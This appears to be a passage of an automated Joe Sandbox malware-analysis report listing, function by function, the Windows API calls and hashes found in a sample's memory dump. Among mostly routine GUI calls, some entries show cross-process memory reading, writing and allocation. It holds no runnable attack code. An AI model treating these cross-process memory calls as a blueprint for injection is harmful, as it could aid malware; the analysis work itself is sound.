                                                              • Instruction ID: 3e243539fb2b73957bad7a45e2e7e75d307490d1a349d6881cfffef8f51c91b7
                                                              • Opcode Fuzzy Hash: 6c683e57cfa1278fe6ec92deef3658387a2e6f7679265cb640a9ddd95d77d787
                                                              • Instruction Fuzzy Hash: E401A275800B15DFC730AF66D990916FBF9EF503193258A3ED1A252931C771AA45CF80
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00CB64E7
                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 00CB64FE
                                                              • MessageBeep.USER32(00000000), ref: 00CB6516
                                                              • KillTimer.USER32(?,0000040A), ref: 00CB6532
                                                              • EndDialog.USER32(?,00000001), ref: 00CB654C
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                              • String ID:
                                                              • API String ID: 3741023627-0
                                                              • Opcode ID: 3d3b0f362ca1b794c9b3e923b483a0a0519cacce4e69a48172baff115aa1b344
                                                              • Instruction ID: 13e8393973f76d38fff2f1359c03ba533d513cdcdc8e36a1507ab272868825b5
                                                              • Opcode Fuzzy Hash: 3d3b0f362ca1b794c9b3e923b483a0a0519cacce4e69a48172baff115aa1b344
                                                              • Instruction Fuzzy Hash: 1001A931540708ABEB305B50DD8EBDA777CFF10B05F000559B597650E1DBF4AA98CB50
                                                              APIs
                                                              • _free.LIBCMT ref: 00C8264E
                                                                • Part of subcall function 00C82D58: RtlFreeHeap.NTDLL(00000000,00000000,?,00C8DB71,00D21DC4,00000000,00D21DC4,00000000,?,00C8DB98,00D21DC4,00000007,00D21DC4,?,00C8DF95,00D21DC4), ref: 00C82D6E
                                                                • Part of subcall function 00C82D58: GetLastError.KERNEL32(00D21DC4,?,00C8DB71,00D21DC4,00000000,00D21DC4,00000000,?,00C8DB98,00D21DC4,00000007,00D21DC4,?,00C8DF95,00D21DC4,00D21DC4), ref: 00C82D80
                                                              • _free.LIBCMT ref: 00C82660
                                                              • _free.LIBCMT ref: 00C82673
                                                              • _free.LIBCMT ref: 00C82684
                                                              • _free.LIBCMT ref: 00C82695
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: d4f6ce5bf56d1060281261e87733bbf6618110a037fc1e4496b0b4fbb76e9185
                                                              • Instruction ID: ba654a5f9398580c0e723951ae9379b1651780f14beb7e65faceb8523e2884b1
                                                              • Opcode Fuzzy Hash: d4f6ce5bf56d1060281261e87733bbf6618110a037fc1e4496b0b4fbb76e9185
                                                              • Instruction Fuzzy Hash: A8F0B775841320EBC626BF54BE498983B65BF38765305860BF434D6375CB710943EFA8
                                                              APIs
                                                                • Part of subcall function 00CBBCDF: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00CB2A60,?,?,00000034,00000800,?,00000034), ref: 00CBBD09
                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00CB2FF0
                                                                • Part of subcall function 00CBBCAA: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00CB2A8F,?,?,00000800,?,00001073,00000000,?,?), ref: 00CBBCD4
                                                                • Part of subcall function 00CBBC06: GetWindowThreadProcessId.USER32(?,?), ref: 00CBBC31
                                                                • Part of subcall function 00CBBC06: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00CB2A24,00000034,?,?,00001004,00000000,00000000), ref: 00CBBC41
                                                                • Part of subcall function 00CBBC06: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00CB2A24,00000034,?,?,00001004,00000000,00000000), ref: 00CBBC57
                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00CB305D
                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00CB30AA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                              • String ID: @
                                                              • API String ID: 4150878124-2766056989
                                                              • Opcode ID: 72a46e2d5a9b8b31ee3683cecf34d7d8fd892d654f5f398db0a6a528d800811f
                                                              • Instruction ID: fb9721fd36b95902952786c9677053473384280d9c890e517c5da9a080bdcce9
                                                              • Opcode Fuzzy Hash: 72a46e2d5a9b8b31ee3683cecf34d7d8fd892d654f5f398db0a6a528d800811f
                                                              • Instruction Fuzzy Hash: 24412C76900228AFDB10EFA4CD85ADEBBB8EF49700F004095FA55B7180DA716F85DB61
                                                              APIs
                                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00CBCAC6
                                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 00CBCB0C
                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00D22990,01305E38), ref: 00CBCB55
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Menu$Delete$InfoItem
                                                              • String ID: 0
                                                              • API String ID: 135850232-4108050209
                                                              • Opcode ID: 345238e88fb8c960f5740c8e05c0b863ad4897b013688e8ae0d7ff48ea56cb2e
                                                              • Instruction ID: d1682651a3bf6700afb0d3428b763e36f36e49896d232f8253396a9b6f857614
                                                              • Opcode Fuzzy Hash: 345238e88fb8c960f5740c8e05c0b863ad4897b013688e8ae0d7ff48ea56cb2e
                                                              • Instruction Fuzzy Hash: 4B41BF702053419FD720DF24D8C6F9ABBE8EF84325F14461DF9A697291D730E904CBA2
                                                              APIs
                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00CEDCD0,00000000,?,?,?,?), ref: 00CE4E09
                                                              • GetWindowLongW.USER32 ref: 00CE4E26
                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00CE4E36
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Window$Long
                                                              • String ID: SysTreeView32
                                                              • API String ID: 847901565-1698111956
                                                              • Opcode ID: 9121e06719cb7d7e19230341c3ff261bf8c588b409813a5921fd8bb3c2515a21
                                                              • Instruction ID: aae7922cdc0f6f821afa84456314e39d4a7c3f171ea4006c767e3a5a6840789f
                                                              • Opcode Fuzzy Hash: 9121e06719cb7d7e19230341c3ff261bf8c588b409813a5921fd8bb3c2515a21
                                                              • Instruction Fuzzy Hash: D4319C31100285AFDF258F39DC85BEA7BA9EB48334F244724F879932E0CB34AD919750
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00CE489F
                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00CE48B3
                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00CE48D7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window
                                                              • String ID: SysMonthCal32
                                                              • API String ID: 2326795674-1439706946
                                                              • Opcode ID: 8f94c26a727a0327a8fac7669c66a30798925ec2e78f05e00bda09c7ff7b936e
                                                              • Instruction ID: 863a3fa8ceda2f9eac2592035d9398a1ed42215a98691455b3787eeb7e30ea46
                                                              • Opcode Fuzzy Hash: 8f94c26a727a0327a8fac7669c66a30798925ec2e78f05e00bda09c7ff7b936e
                                                              • Instruction Fuzzy Hash: BD21D132600258BFDF258F90CC86FEE3B69EF48714F110214FA15AB1D0D6B5A895DBA0
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00CE5064
                                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00CE5072
                                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00CE5079
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              Similarity
                                                              • API ID: MessageSend$DestroyWindow
                                                              • String ID: msctls_updown32
                                                              • API String ID: 4014797782-2298589950
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00CE419F
                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00CE41AF
                                                              • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00CE41D5
                                                              Similarity
                                                              • API ID: MessageSend$MoveWindow
                                                              • String ID: Listbox
                                                              • API String ID: 3315199576-2633736733
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00CE4BAE
                                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00CE4BC3
                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00CE4BD0
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: msctls_trackbar32
                                                              • API String ID: 3850602802-1010561917
                                                              APIs
                                                              • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00CE6220
                                                              • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00CE624D
                                                              • DrawMenuBar.USER32(?), ref: 00CE625C
                                                              Similarity
                                                              • API ID: Menu$InfoItem$Draw
                                                              • String ID: 0
                                                              • API String ID: 3227129158-4108050209
                                                              Similarity
                                                              • API ID: __alldvrm$_strrchr
                                                              • String ID:
                                                              • API String ID: 1036877536-0
                                                              APIs
                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00CF0BD4,?), ref: 00CB0E80
                                                              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00CF0BD4,?), ref: 00CB0E98
                                                              • CLSIDFromProgID.OLE32(?,?,00000000,00CEDCE0,000000FF,?,00000000,00000800,00000000,?,00CF0BD4,?), ref: 00CB0EBD
                                                              • _memcmp.LIBVCRUNTIME ref: 00CB0EDE
                                                              Similarity
                                                              • API ID: FromProg$FreeTask_memcmp
                                                              • String ID:
                                                              • API String ID: 314563124-0
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00CDB00B
                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00CDB019
                                                                • Part of subcall function 00C5B25F: _wcslen.LIBCMT ref: 00C5B269
                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00CDB0FB
                                                              • CloseHandle.KERNEL32(00000000), ref: 00CDB10A
                                                                • Part of subcall function 00C6E2E5: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00C94D4D,?), ref: 00C6E30F
                                                              Similarity
                                                              • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                              • String ID:
                                                              • API String ID: 1991900642-0
                                                              APIs
                                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 00CD245A
                                                              • WSAGetLastError.WSOCK32 ref: 00CD2468
                                                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00CD24E7
                                                              • WSAGetLastError.WSOCK32 ref: 00CD24F1
                                                              Similarity
                                                              • API ID: ErrorLast$socket
                                                              • String ID:
                                                              • API String ID: 1881357543-0
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 00CE6C41
                                                              • ScreenToClient.USER32(?,?), ref: 00CE6C74
                                                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00CE6CE1
                                                              Similarity
                                                              • API ID: Window$ClientMoveRectScreen
                                                              • String ID:
                                                              • API String ID: 3880355969-0
                                                              APIs
                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00CC60DD
                                                              • GetLastError.KERNEL32(?,00000000), ref: 00CC6103
                                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00CC6128
                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00CC6154
                                                              Similarity
                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                              • String ID:
                                                              • API String ID: 3321077145-0
                                                              APIs
                                                              • GetForegroundWindow.USER32 ref: 00CE204A
                                                                • Part of subcall function 00CB42CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 00CB42E6
                                                                • Part of subcall function 00CB42CC: GetCurrentThreadId.KERNEL32 ref: 00CB42ED
                                                                • Part of subcall function 00CB42CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00CB2E43), ref: 00CB42F4
                                                              • GetCaretPos.USER32(?), ref: 00CE205E
                                                              • ClientToScreen.USER32(00000000,?), ref: 00CE20AB
                                                              • GetForegroundWindow.USER32 ref: 00CE20B1
                                                              Similarity
                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                              • String ID:
                                                              • API String ID: 2759813231-0
                                                              • Opcode ID: 96bbfce4ee5a8e352d4ede75f57f5e0cfaa325313ab7842e4ce728158bbc2e8d
                                                              • Instruction ID: ecab7fbac5dd2ce72d55a9222cbf84fb74485f61fd98e5669038e34f312410a9
                                                              • Opcode Fuzzy Hash: 96bbfce4ee5a8e352d4ede75f57f5e0cfaa325313ab7842e4ce728158bbc2e8d
                                                              • Instruction Fuzzy Hash: BF313275D00149AFC704DFA6C881DAEB7FCEF58304B50846AE415E7252DB71DE45DBA0
                                                              APIs
                                                                • Part of subcall function 00C54154: _wcslen.LIBCMT ref: 00C54159
                                                              • _wcslen.LIBCMT ref: 00CBE7F7
                                                              • _wcslen.LIBCMT ref: 00CBE80E
                                                              • _wcslen.LIBCMT ref: 00CBE839
                                                              • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00CBE844
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$ExtentPoint32Text
                                                              • String ID:
                                                              • API String ID: 3763101759-0
                                                              • Opcode ID: 9620f9c29d176e564a5445c8038d1db339a4672e9f8b693ed3830649258b5da3
                                                              • Instruction ID: 04ca7996954a8d49997e5adb84e9d648a7a9f25820eb2e51c93e33e1f3800faa
                                                              • Opcode Fuzzy Hash: 9620f9c29d176e564a5445c8038d1db339a4672e9f8b693ed3830649258b5da3
                                                              • Instruction Fuzzy Hash: 8E21B572D00614AFCB11DFA8C981BEEB7F8EF45760F148065E818AB281D7709E41DBA1
                                                              APIs
                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00CE3169
                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00CE3183
                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00CE3191
                                                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00CE319F
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Window$Long$AttributesLayered
                                                              • String ID:
                                                              • API String ID: 2169480361-0
                                                              • Opcode ID: faa1351589f018db3ed80b47fccacc5ae4f7620165225647b1021c06dbb7f9bf
                                                              • Instruction ID: 3e3bdb53907699b27225dbf881842f0feaf2c6ff7af3301a05b1d4f7c809285a
                                                              • Opcode Fuzzy Hash: faa1351589f018db3ed80b47fccacc5ae4f7620165225647b1021c06dbb7f9bf
                                                              • Instruction Fuzzy Hash: 5F21A1352085D1AFD7149B15CC88FAE7BA5AF85324F14815CF8668B2D2CB75FE82C790
                                                              APIs
                                                                • Part of subcall function 00CB960C: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00CB8199,?,000000FF,?,00CB8FE3,00000000,?,0000001C,?,?), ref: 00CB961B
                                                                • Part of subcall function 00CB960C: lstrcpyW.KERNEL32(00000000,?,?,00CB8199,?,000000FF,?,00CB8FE3,00000000,?,0000001C,?,?,00000000), ref: 00CB9641
                                                                • Part of subcall function 00CB960C: lstrcmpiW.KERNEL32(00000000,?,00CB8199,?,000000FF,?,00CB8FE3,00000000,?,0000001C,?,?), ref: 00CB9672
                                                              • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00CB8FE3,00000000,?,0000001C,?,?,00000000), ref: 00CB81B2
                                                              • lstrcpyW.KERNEL32(00000000,?,?,00CB8FE3,00000000,?,0000001C,?,?,00000000), ref: 00CB81D8
                                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,00CB8FE3,00000000,?,0000001C,?,?,00000000), ref: 00CB8213
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: lstrcmpilstrcpylstrlen
                                                              • String ID: cdecl
                                                              • API String ID: 4031866154-3896280584
                                                              • Opcode ID: c2cdf451ed0f7da915391ca6e6ed22a3bed9b69bfd7f23bd062a674c64e386fa
                                                              • Instruction ID: 1f282a67879441ea44e7a5bd1f4338a656c3141a7674426f20ff55dd3d376120
                                                              • Opcode Fuzzy Hash: c2cdf451ed0f7da915391ca6e6ed22a3bed9b69bfd7f23bd062a674c64e386fa
                                                              • Instruction Fuzzy Hash: D711D37A200341AFCB145F38D885ABE77A9FF99350F50402AF906CB260EF719905D7A1
                                                              APIs
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00CE866A
                                                              • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00CE8689
                                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00CE86A1
                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00CCC10A,00000000), ref: 00CE86CA
                                                                • Part of subcall function 00C52441: GetWindowLongW.USER32(00000000,000000EB), ref: 00C52452
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Window$Long
                                                              • String ID:
                                                              • API String ID: 847901565-0
                                                              • Opcode ID: 55c2560e7d072b9c58647ddb0e9dde984e60893f04031c8e9815e8d1f8a03d05
                                                              • Instruction ID: 528a9aea75c8c09297969c22553a931eebe64fb8c7fdde6e5fafd0126da63f94
                                                              • Opcode Fuzzy Hash: 55c2560e7d072b9c58647ddb0e9dde984e60893f04031c8e9815e8d1f8a03d05
                                                              • Instruction Fuzzy Hash: C211AF31500295AFCB109F6ADC48B6A3BA9BB49374F114724F939DB2F0DB308A55DB90
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 72144a2b06bfe87e45b4171367c299c04ea981dd7501082e02e1637e3e8cc1a9
                                                              • Instruction ID: 0ffd8f97a1c40a76cd39a7fc8f7dec1f3c305efea8465df58af50d719a0b208b
                                                              • Opcode Fuzzy Hash: 72144a2b06bfe87e45b4171367c299c04ea981dd7501082e02e1637e3e8cc1a9
                                                              • Instruction Fuzzy Hash: 0C01A2B22092157EF62136786CC9F2BA74DDF523BCB350326F631911D1DB708D41A768
                                                              APIs
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00CB22D7
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CB22E9
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CB22FF
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CB231A
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 2403c2ecd236f574aeab44ccc790fbf9795dc2666c1894552755f09701f2f382
                                                              • Instruction ID: 7a79e405a4a8ed9aec6f3d8ce2e6f19625e7446b869b170a5f7d5bbe72500d8c
                                                              • Opcode Fuzzy Hash: 2403c2ecd236f574aeab44ccc790fbf9795dc2666c1894552755f09701f2f382
                                                              • Instruction Fuzzy Hash: 0911093A900218FFEB119BA5CD85FDDFBB8EB08750F200091EA11B7290D671AE10DB94
                                                              APIs
                                                                • Part of subcall function 00C52441: GetWindowLongW.USER32(00000000,000000EB), ref: 00C52452
                                                              • GetClientRect.USER32(?,?), ref: 00CEA890
                                                              • GetCursorPos.USER32(?), ref: 00CEA89A
                                                              • ScreenToClient.USER32(?,?), ref: 00CEA8A5
                                                              • DefDlgProcW.USER32(?,00000020,?,00000000,?), ref: 00CEA8D9
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
